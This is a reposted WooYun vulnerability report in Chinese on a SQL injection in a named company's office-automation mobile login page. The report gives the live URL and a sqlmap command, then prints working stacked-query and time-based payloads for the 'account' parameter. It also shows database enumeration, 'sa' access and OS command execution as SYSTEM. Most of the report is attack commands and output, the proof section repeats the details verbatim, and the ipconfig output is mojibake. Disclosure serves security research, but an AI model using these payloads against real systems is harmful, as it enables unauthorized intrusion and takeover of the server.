华业通讯协同办公可SQL注入/getshell

admin
admin
admin
145721
文章
119
评论
2017年3月31日03:05:29评论444 views字数 210阅读0分42秒阅读模式
摘要

2016-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-08: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(0) 关注此漏洞

缺陷编号: WooYun-2016-188456

漏洞标题: 华业通讯协同办公可SQL注入/getshell

相关厂商: 华业通讯

漏洞作者: 路人甲

提交时间: 2016-03-24 10:28

公开时间: 2016-05-08 10:28

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2016-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

问题链接:http://oa.huayetongxun.com:91/MobileApp/login.aspx

以下命令可跑出注入点

code 区域 
sqlmap.py -u "http://oa.huayetongxun.com:91/MobileApp/login.aspx" --forms

可直接用sqlmap获得shell

sqlmap信息:

code 区域 
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
 ---
 Parameter: account (POST)
     Type: boolean-based blind
     Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';IF(4583=4583) SELECT 4583 ELSE DROP FUNCTION dDBG--&password=&remember=on
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';WAITFOR DELAY '0:0:5'--&password=&remember=on
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh' WAITFOR DELAY '0:0:5'--&password=&remember=on
 ---
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, Microsoft Share Point 12.0.0.6421, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2008
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: account (POST)
     Type: boolean-based blind
     Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';IF(4583=4583) SELECT 4583 ELSE DROP FUNCTION dDBG--&password=&remember=on
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';WAITFOR DELAY '0:0:5'--&password=&remember=on
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh' WAITFOR DELAY '0:0:5'--&password=&remember=on
 ---
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, Microsoft Share Point 12.0.0.6421, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2008
 available databases [9]:
 [*] [SharePoint_AdminContent_d328eaf0-32d9-4f24-ac7d-9df700a28c9c]
 [*] EIS
 [*] master
 [*] model
 [*] msdb
 [*] ReportServer
 [*] ReportServerTempDB
 [*] SharePoint_Config
 [*] tempdb
 
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: account (POST)
     Type: boolean-based blind
     Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';IF(4583=4583) SELECT 4583 ELSE DROP FUNCTION dDBG--&password=&remember=on
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';WAITFOR DELAY '0:0:5'--&password=&remember=on
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh' WAITFOR DELAY '0:0:5'--&password=&remember=on
 ---
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, Microsoft Share Point 12.0.0.6421, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2008
 current database:    'EIS'
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: account (POST)
     Type: boolean-based blind
     Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';IF(4583=4583) SELECT 4583 ELSE DROP FUNCTION dDBG--&password=&remember=on
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';WAITFOR DELAY '0:0:5'--&password=&remember=on
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh' WAITFOR DELAY '0:0:5'--&password=&remember=on
 ---
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, Microsoft Share Point 12.0.0.6421, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2008
 current user:    'sa'

CMD shell执行情况:

code 区域 
command standard output:
 ---
 Windows IP 閰嶇疆
  
  
 浠ュお缃戦€傞厤鍣?鏈湴杩炴帴 6:
  
    濯掍綋鐘舵€? . . . . . . . . . . . . : 濯掍綋宸叉柇寮€
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
  
 浠ュお缃戦€傞厤鍣?鏈湴杩炴帴 5:
  
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
    鏈湴閾炬帴 IPv6 鍦板潃. . . . . . . . : fe80::9165:ca5a:1d6a:8921%19
    IPv4 鍦板潃 . . . . . . . . . . . . : 192.168.14.177
    瀛愮綉鎺╃爜  . . . . . . . . . . . . : 255.255.255.192
    榛樿缃戝叧. . . . . . . . . . . . . : 192.168.14.254
  
 闅ч亾閫傞厤鍣?Teredo Tunneling Pseudo-Interface:
  
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
    IPv6 鍦板潃 . . . . . . . . . . . . : 2001:0:ddc0:992d:cfb:33ec:3f57:f14e
    鏈湴閾炬帴 IPv6 鍦板潃. . . . . . . . : fe80::cfb:33ec:3f57:f14e%12
    榛樿缃戝叧. . . . . . . . . . . . . : ::
  
 闅ч亾閫傞厤鍣?isatap.{0E7A5DCC-11F7-4536-A0EB-0D878912FCD5}:
  
    濯掍綋鐘舵€? . . . . . . . . . . . . : 濯掍綋宸叉柇寮€
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
  
 闅ч亾閫傞厤鍣?isatap.{12C30AEA-7957-4219-B786-6D807932284F}:
  
    濯掍綋鐘舵€? . . . . . . . . . . . . : 濯掍綋宸叉柇寮€
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
 ---
 command standard output:    'nt authority/system'

漏洞证明:

问题链接:http://oa.huayetongxun.com:91/MobileApp/login.aspx

以下命令可跑出注入点

code 区域 
sqlmap.py -u "http://oa.huayetongxun.com:91/MobileApp/login.aspx" --forms

可直接用sqlmap获得shell

sqlmap信息:

code 区域 
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
 ---
 Parameter: account (POST)
     Type: boolean-based blind
     Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';IF(4583=4583) SELECT 4583 ELSE DROP FUNCTION dDBG--&password=&remember=on
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';WAITFOR DELAY '0:0:5'--&password=&remember=on
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh' WAITFOR DELAY '0:0:5'--&password=&remember=on
 ---
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, Microsoft Share Point 12.0.0.6421, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2008
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: account (POST)
     Type: boolean-based blind
     Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';IF(4583=4583) SELECT 4583 ELSE DROP FUNCTION dDBG--&password=&remember=on
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';WAITFOR DELAY '0:0:5'--&password=&remember=on
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh' WAITFOR DELAY '0:0:5'--&password=&remember=on
 ---
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, Microsoft Share Point 12.0.0.6421, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2008
 available databases [9]:
 [*] [SharePoint_AdminContent_d328eaf0-32d9-4f24-ac7d-9df700a28c9c]
 [*] EIS
 [*] master
 [*] model
 [*] msdb
 [*] ReportServer
 [*] ReportServerTempDB
 [*] SharePoint_Config
 [*] tempdb
 
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: account (POST)
     Type: boolean-based blind
     Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';IF(4583=4583) SELECT 4583 ELSE DROP FUNCTION dDBG--&password=&remember=on
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';WAITFOR DELAY '0:0:5'--&password=&remember=on
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh' WAITFOR DELAY '0:0:5'--&password=&remember=on
 ---
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, Microsoft Share Point 12.0.0.6421, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2008
 current database:    'EIS'
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: account (POST)
     Type: boolean-based blind
     Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';IF(4583=4583) SELECT 4583 ELSE DROP FUNCTION dDBG--&password=&remember=on
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh';WAITFOR DELAY '0:0:5'--&password=&remember=on
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind (comment)
     Payload: __VIEWSTATE=/wEPDwULLTEwNzI1NjM4NDcPZBYCAgMPZBYEAgEPFgIeA3NyY2RkAgkPFgIeCWlubmVyaHRtbAVF5peg5rOV55m75b2V5pyN5Yqh5Zmo44CC6K+356Gu5L+d55So5oi35ZCN5ZKM5a+G56CB5q2j56Gu5bm26YeN6K+V44CCZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIcmVtZW1iZXJdVr4rVu8RvJfaZTYZIy3sYaPUZg==&account=jZbh' WAITFOR DELAY '0:0:5'--&password=&remember=on
 ---
 web server operating system: Windows 2008 R2 or 7
 web application technology: ASP.NET, Microsoft IIS 7.5, Microsoft Share Point 12.0.0.6421, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2008
 current user:    'sa'

CMD shell执行情况:

code 区域 
command standard output:
 ---
 Windows IP 閰嶇疆
  
  
 浠ュお缃戦€傞厤鍣?鏈湴杩炴帴 6:
  
    濯掍綋鐘舵€? . . . . . . . . . . . . : 濯掍綋宸叉柇寮€
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
  
 浠ュお缃戦€傞厤鍣?鏈湴杩炴帴 5:
  
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
    鏈湴閾炬帴 IPv6 鍦板潃. . . . . . . . : fe80::9165:ca5a:1d6a:8921%19
    IPv4 鍦板潃 . . . . . . . . . . . . : 192.168.14.177
    瀛愮綉鎺╃爜  . . . . . . . . . . . . : 255.255.255.192
    榛樿缃戝叧. . . . . . . . . . . . . : 192.168.14.254
  
 闅ч亾閫傞厤鍣?Teredo Tunneling Pseudo-Interface:
  
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
    IPv6 鍦板潃 . . . . . . . . . . . . : 2001:0:ddc0:992d:cfb:33ec:3f57:f14e
    鏈湴閾炬帴 IPv6 鍦板潃. . . . . . . . : fe80::cfb:33ec:3f57:f14e%12
    榛樿缃戝叧. . . . . . . . . . . . . : ::
  
 闅ч亾閫傞厤鍣?isatap.{0E7A5DCC-11F7-4536-A0EB-0D878912FCD5}:
  
    濯掍綋鐘舵€? . . . . . . . . . . . . : 濯掍綋宸叉柇寮€
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
  
 闅ч亾閫傞厤鍣?isatap.{12C30AEA-7957-4219-B786-6D807932284F}:
  
    濯掍綋鐘舵€? . . . . . . . . . . . . : 濯掍綋宸叉柇寮€
    杩炴帴鐗瑰畾鐨?DNS 鍚庣紑 . . . . . . . : 
 ---
 command standard output:    'nt authority/system'

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin